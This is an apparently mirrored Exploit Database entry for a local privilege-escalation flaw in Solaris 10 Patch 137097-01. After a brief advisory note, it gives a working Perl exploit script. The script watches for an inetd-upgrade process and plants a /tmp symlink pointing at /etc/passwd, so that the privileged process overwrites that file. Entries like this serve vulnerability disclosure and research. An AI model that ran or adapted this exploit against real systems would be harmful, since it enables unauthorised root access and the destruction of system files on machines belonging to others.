Solaris 10 Patch 137097-01 – Symlink Privilege Escalation

• Exploit Database
• 129 阅读

• 作者： Larry Cashdollar
  日期： 2012-08-11
• 类别：

  • local
  平台：

  • solaris
• 来源：https://www.exploit-db.com/exploits/20418/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  source: https://www.securityfocus.com/bid/54919/info   Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.   Local attackers can exploit this issue to gain elevated privileges on affected computers.   #!/usr/bin/perl $clobber = "/etc/passwd"; while(1) { open ps,"ps -ef | grep -v grep |grep -v PID |";   while(<ps>) { @args = split " ", $_;   if (/inetd-upgrade/) { print "Symlinking iconf_entries.$args[1] to$clobber\n"; symlink($clobber,"/tmp/iconf_entries.$args[1]"); exit(1); } }   }